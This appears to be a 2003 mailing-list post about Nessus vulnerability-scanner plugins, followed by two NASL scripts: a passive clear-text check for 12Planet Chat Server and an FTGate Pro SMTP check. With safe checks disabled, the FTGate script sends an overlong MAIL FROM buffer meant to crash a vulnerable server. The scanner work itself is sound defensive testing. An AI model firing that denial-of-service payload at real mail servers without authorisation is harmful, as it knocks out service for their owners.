Hi,

First, a question regarding:
11391 BSD ftpd setproctitle() format string
11495 tanned format string vulnerability
These are listed as ACT_ATTACK, but looking at the source I am a little worried they could crash servers.
Can anyone confirm these are safe to run against vulnerable hosts?

And two plugin changes:
11579 - Added an exit(0) line. This is important, as previously the script would run the attack even in safe mode.
11591 - Fixed bug where it always gave its security warning on port 1.

Regards,
Paul

--
Paul Johnston
Internet Security Specialist
Westpoint Limited
Albion Wharf, 19 Albion Street, Manchester, M1 5LN England
Tel: +44 (0)161 237 1028
Fax: +44 (0)161 237 1031
email: paulat_private
web: www.westpoint.ltd.uk

#
# This script was written by Renaud Deraison <deraisonat_private>
#
# See the Nessus Scripts License for details
#
# Plugin 11591 - 12Planet Chat Server reachable over a clear-text transport.
#
# Passive check (ACT_GATHER_INFO): it only fetches "/" on each web port and
# inspects the response, so it sends nothing that could affect the service.
# The finding is reported only when the port is plain TCP (ENCAPS_IP), i.e.
# not wrapped in SSL/TLS, which is what "clear text" refers to below.
#
if(description)
{
 script_id(11591);
 script_bugtraq_id(7354);
 script_version ("$Revision: 1.1 $");
 name["english"] = "12Planet Chat Server ClearText Password";
 script_name(english:name["english"]);
 desc["english"] = "
The remote host is running 12Planet Chat Server - a web based chat server written in Java.

The connection to this server is done over clear text, which means that an attacker who can sniff the data going to this host could obtain the administrator password of the web site, and use it to gain unauthorized access to this chat server.

Solution : None at this time
Risk factor : Low";
 script_description(english:desc["english"]);
 summary["english"] = "Checks for the data encapsulation of 12Planet Chat Server";
 script_summary(english:summary["english"]);
 script_category(ACT_GATHER_INFO);
 script_copyright(english:"This script is Copyright (C) 2003 Renaud Deraison");
 family["english"] = "Misc.";
 script_family(english:family["english"]);
 script_dependencie("find_service.nes", "http_version.nasl");
 script_require_ports("Services/www", 8080);
 exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");

# Every web port found by find_service, plus 8080 (the product's usual port)
# in case it was not fingerprinted as www.
ports = add_port_in_list(list:get_kb_list("Services/www"), port:8080);

foreach port (ports)
{
 if(get_port_state(port))
 {
  # Fetch the front page and look for the product's page-generator marker.
  req = http_get(item:"/", port:port);
  res = http_keepalive_send_recv(port:port, data:req);
  if(res != NULL && "one2planet.tools.PSDynPage" >< res)
  {
   # Only a plain-TCP transport is a finding; an SSL/TLS-wrapped port is not
   # clear text. The port under test is passed explicitly so the warning is
   # attached to the right port (see the accompanying mail about the earlier
   # port-1 report).
   if(get_port_transport(port) == ENCAPS_IP){
    security_warning(port);
    # Stop after the first affected port; further www ports are not reported.
    exit(0);
   }
  }
 }
}

#
# This script was written by Renaud Deraison <deraisonat_private>
#
# See the Nessus Scripts License for details
#
# Ref:
# From: "Dennis Rand" <derat_private>
# To: "Vulnwatch@Vulnwatch. Org" <vulnwatchat_private>,
# Date: Tue, 6 May 2003 14:57:25 +0200
# Subject: [VulnWatch] Multiple Buffer Overflow Vulnerabilities Found in FTGate Pro Mail Server v. 1.22 (1328)
#
# Plugin 11579 - FTGate Pro SMTP denial of service.
#
# ACT_MIXED_ATTACK: with safe checks enabled the plugin reports from the
# banner alone and exits; with safe checks disabled it performs the actual
# disruptive test described in the description (an overlong MAIL FROM
# argument) and then checks whether the service is still answering.
# Operators should expect the non-safe path to take a vulnerable server down.
#
if(description)
{
 script_id(11579);
 script_version ("$Revision: 1.1 $");
 name["english"] = "FTgate DoS";
 script_name(english:name["english"]);
 desc["english"] = "
The remote SMTP server is running FT Gate Pro.

There is a flaw in this version which may allow an attacker to disable this SMTP server remotely, by supplying a too long argument to the MAIL FROM and RCPT TO SMTP commands.

An attacker may use this flaw to prevent this host from processing the mail it should process.

Solution : Upgrade to FTgate Pro Mail Server v. 1.22 Hotfix 1330
Risk Factor : Serious";
 script_description(english:desc["english"]);
 summary["english"] = "Checks for FTgate";
 script_summary(english:summary["english"]);
 script_category(ACT_MIXED_ATTACK);
 script_copyright(english:"This script is Copyright (C) 2003 Renaud Deraison",
                 francais:"Ce script est Copyright (C) 2003 Renaud Deraison");
 family["english"] = "Denial of Service";
 script_family(english:family["english"]);
 script_dependencie("find_service.nes");
 script_require_ports("Services/smtp", 25);
 exit(0);
}

#
# The script code starts here
#

include("smtp_func.inc");

# Use the SMTP port found by find_service, falling back to 25.
port = get_kb_item("Services/smtp");
if(!port)port = 25;

# Banner from the knowledge base; nothing is sent to the host at this point.
banner = get_smtp_banner(port:port);
if(banner)
{
 if("FTGatePro" >< banner)
 {
  if(safe_checks())
  {
   # Safe-checks path: banner-based report only. The version is not
   # verified, hence the explicit false-positive caveat in the report.
   report = "
The remote SMTP server is running FT Gate Pro.

There is a flaw in this version which may allow an attacker to disable this SMTP server remotely, by supplying a too long argument to the MAIL FROM and RCPT TO SMTP commands.

An attacker may use this flaw to prevent this host from processing the mail it should process.

*** Since safe checks are enabled, Nessus could not verify this
*** flaw nor the version of the remote FTGatePro server, so this
*** might be a false positive

Solution : Upgrade to FTgate Pro Mail Server v. 1.22 Hotfix 1330
Risk Factor : Serious";
   security_hole(port:port, data:report);
   # This exit is what keeps the safe-checks run from falling through into
   # the active test below (the fix mentioned in the accompanying mail).
   exit(0);
  }

  # Active (non-safe) path. Connect and re-read the live banner rather than
  # trusting the cached one.
  soc = open_sock_tcp(port);
  if(!soc)exit(0);
  r = smtp_recv_banner(socket:soc);
  # Bail out if the live banner no longer identifies FTGatePro.
  if("FTGatePro" >!< r) exit(0);

  send(socket:soc, data:string("HELO there\r\n"));
  r = recv_line(socket:soc, length:4096);
  # The overlong MAIL FROM argument described above. This is the disruptive
  # step: on a vulnerable host the service may stop responding.
  send(socket:soc, data:string("MAIL FROM: ", crap(2400), "@", crap(2400),".com\r\n\r\n"));
  # Short timeout: a vulnerable server may never answer.
  r = recv_line(socket:soc, length:4096, timeout:1);
  close(soc);

  # Verdict is based on whether the service still accepts connections and
  # still sends a banner. NOTE(review): a slow or connection-limited server
  # could fail here for unrelated reasons, so this can false-positive.
  soc = open_sock_tcp(port);
  if(!soc){
   # Service no longer accepts connections: reported as vulnerable.
   security_hole(port);
   exit(0);
  }
  r = smtp_recv_banner(socket:soc);
  # Connected but no banner: also treated as the service being down.
  if(!r)security_hole(port);
  close(soc);
 }
}